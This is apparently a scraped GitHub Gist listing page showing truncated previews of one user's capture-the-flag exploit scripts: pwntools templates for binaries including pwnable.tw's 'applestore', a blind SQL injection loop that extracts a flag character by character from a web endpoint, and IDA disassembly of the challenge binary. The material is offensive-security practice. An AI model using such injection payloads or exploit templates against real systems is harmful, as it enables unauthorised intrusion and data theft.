H4niz
/ easiest.py
Last active
December 1, 2018 10:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| __DEBUG__ = False | |
| __BIN__ = "./easiest" | |
| ELF(__BIN__) | |
| __LIBC__ = "" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| from ctypes import * | |
| ######################## | |
| __FILE__ = "./lucky" | |
| __LIBC__ = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") | |
| __HOST__ = "167.99.143.206" |
H4niz
/ CoinMining.py
Created
June 21, 2018 15:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| url = "http://13.251.43.244/scandomain.php" | |
| data = {"action":"docheck","domainName":"smallbox.ir\\","coin":"or (select length(flag) from flag) = 41 -- -"} | |
| i=0 | |
| flag="" | |
| for i in range(len(flag)+1,41): | |
| for c in range(32,127): | |
| data["coin"]="or (select ascii(substring(flag,%d,1)) from bingo) = %d-- -"%(i,c) |
H4niz
/ vul_app.py
Created
June 19, 2018 18:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| io = process("./get_binary") | |
| context.clear() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ----------------------------------- | |
| # | n00b-author: h4niz | | |
| # ----------------------------------- | |
| #!/usr/bin/env python | |
| from pwn import * | |
| import struct | |
| # io = process("./fruitretailer_50E291AAFA5777625B18530F5C6F7A92", env={'_LD_PRELOAD': 'libc6_2.27-3ubuntu1_amd64.so'}) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| host = "chall.pwnable.tw" | |
| port = 10104 | |
| if len(sys.argv) < 2: | |
| io = process("./applestore", env={"_LD_PRELOAD": "libc_32.so.6"}) | |
| elf = ELF("applestore") | |
| context.arch = "i386" |
H4niz
/ handler.asm
Created
June 5, 2018 16:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text:08048BD3 handler proc near ; CODE XREF: main+4A↓p | |
| .text:08048BD3 | |
| .text:08048BD3 iVar = dword ptr -28h | |
| .text:08048BD3 nptr = byte ptr -22h | |
| .text:08048BD3 var_C = dword ptr -0Ch | |
| .text:08048BD3 | |
| .text:08048BD3 ; __unwind { | |
| .text:08048BD3 push ebp | |
| .text:08048BD4 mov ebp, esp | |
| .text:08048BD6 sub esp, 38h |
H4niz
/ checkout.asm
Created
June 5, 2018 16:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text:08048B3B checkout proc near ; CODE XREF: handler:loc_8048C4F↓p | |
| .text:08048B3B | |
| .text:08048B3B var_28 = dword ptr -28h | |
| .text:08048B3B var_24 = dword ptr -24h | |
| .text:08048B3B Iphone8_chunk = dword ptr -20h | |
| .text:08048B3B var_1C = dword ptr -1Ch | |
| .text:08048B3B var_C = dword ptr -0Ch | |
| .text:08048B3B | |
| .text:08048B3B ; __unwind { | |
| .text:08048B3B push ebp |
H4niz
/ delete.asm
Created
June 5, 2018 16:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text:08048999 delete proc near ; CODE XREF: handler:loc_8048C41↓p | |
| .text:08048999 | |
| .text:08048999 index = dword ptr -38h | |
| .text:08048999 _cart = dword ptr -34h | |
| .text:08048999 Item_Num = dword ptr -30h | |
| .text:08048999 next_chunk = dword ptr -2Ch | |
| .text:08048999 Prev_chunk = dword ptr -28h | |
| .text:08048999 nptr = byte ptr -22h | |
| .text:08048999 var_C = dword ptr -0Ch | |
| .text:08048999 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text:0804886B add proc near ; CODE XREF: handler:loc_8048C3A↓p | |
| .text:0804886B | |
| .text:0804886B heap_space = dword ptr -2Ch | |
| .text:0804886B var_28 = dword ptr -28h | |
| .text:0804886B nptr = byte ptr -22h | |
| .text:0804886B var_C = dword ptr -0Ch | |
| .text:0804886B | |
| .text:0804886B ; __unwind { | |
| .text:0804886B push ebp | |
| .text:0804886C mov ebp, esp |